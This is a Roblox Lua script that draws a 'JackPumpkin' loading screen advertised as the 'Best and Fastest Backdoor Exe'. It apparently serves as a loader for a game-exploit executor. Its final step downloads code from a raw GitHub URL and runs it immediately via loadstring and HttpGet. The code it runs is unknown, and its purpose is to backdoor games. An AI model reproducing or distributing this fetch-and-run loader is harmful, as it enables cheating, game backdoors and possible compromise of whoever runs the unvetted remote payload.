local G2L = {};

G2L["1"] = Instance.new("ScreenGui", game.CoreGui);
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
G2L["1"]["Name"] = [[JackPumpkinGui]];

G2L["2"] = Instance.new("Frame", G2L["1"]);
G2L["2"]["BorderSizePixel"] = 0;
G2L["2"]["BackgroundColor3"] = Color3.fromRGB(58, 60, 62);
G2L["2"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["2"]["Size"] = UDim2.new(0, 402, -0.07476, 244);
G2L["2"]["Position"] = UDim2.new(0.5, 0, 0.53326, 0);
G2L["2"]["Name"] = [[MainFrame]];

G2L["3"] = Instance.new("Frame", G2L["2"]);
G2L["3"]["BorderSizePixel"] = 0;
G2L["3"]["BackgroundColor3"] = Color3.fromRGB(239, 248, 255);
G2L["3"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["3"]["Size"] = UDim2.new(-0.02, 402, 0.03, 201);
G2L["3"]["Position"] = UDim2.new(0.5, 0, 0.49957, 0);
G2L["3"]["BackgroundTransparency"] = 0.95;

G2L["5"] = Instance.new("TextLabel", G2L["3"]);
G2L["5"]["TextSize"] = 25;
G2L["5"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5"]["BackgroundTransparency"] = 1;
G2L["5"]["Size"] = UDim2.new(-0.1, 200, -0.08554, 50);
G2L["5"]["Text"] = [[Best and Fastest Backdoor Exe]];
G2L["5"]["Position"] = UDim2.new(0.06229, 0, 0.20771, 0);

G2L["6"] = Instance.new("Frame", G2L["3"]);
G2L["6"]["Size"] = UDim2.new(0, 238, 0, 6);
G2L["6"]["Position"] = UDim2.new(0.0398, 0, 0.91156, 0);
G2L["6"]["BackgroundTransparency"] = 0.8;

G2L["7"] = Instance.new("Frame", G2L["6"]);
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Size"] = UDim2.new(0, 0, 0, 6);
G2L["7"]["BackgroundTransparency"] = 0.8;

G2L["a"] = Instance.new("TextLabel", G2L["3"]);
G2L["a"]["TextSize"] = 18;
G2L["a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["BackgroundTransparency"] = 1;
G2L["a"]["Size"] = UDim2.new(-0.18706, 200, -0.15797, 50);
G2L["a"]["Text"] = [[Credit : LuaBypasss]];
G2L["a"]["Position"] = UDim2.new(0.66393, 0, 0.87074, 0);

G2L["b"] = Instance.new("TextLabel", G2L["3"]);
G2L["b"]["TextSize"] = 39;
G2L["b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["b"]["BackgroundTransparency"] = 1;
G2L["b"]["Text"] = [[JackPumpkin]];
G2L["b"]["Position"] = UDim2.new(0.06229, 0, 0.06487, 0);

G2L["c"] = Instance.new("Frame", G2L["1"]);
G2L["c"]["Size"] = UDim2.new(0.99182, 1, 0.97679, 1);
G2L["c"]["BackgroundTransparency"] = 1;
G2L["c"]["Name"] = [[Ops]];

G2L["e"] = Instance.new("TextLabel", G2L["c"]);
G2L["e"]["TextSize"] = 39;
G2L["e"]["TextTransparency"] = 1;
G2L["e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["e"]["BackgroundTransparency"] = 1;
G2L["e"]["Text"] = [[JackPumpkin]];
G2L["e"]["Name"] = [[BottomTitle]];

-- Animasi dan Loadstring Lanjutan
task.spawn(function()
	if not game:IsLoaded() then game.Loaded:Wait() end
	task.wait(2)
	
	G2L["7"]:TweenSize(UDim2.new(0, 238, 0, 8), "Out", "Quad", 0.5, true)
	task.wait(1)
	
	G2L["2"]:TweenPosition(UDim2.new(0.5, 0, 1.47, 0))
	
	for i = 1, 0.3, -0.1 do
		G2L["e"].TextTransparency = i
		task.wait(0.05)
	end
	
	-- MANGGIL LINK LANJUTAN LU
	loadstring(game:HttpGet("https://raw.githubusercontent.com/daffawibowo67-maker/JackPumpkin/refs/heads/main/JackPumpkin.txt"))()
end)

return G2L["1"];
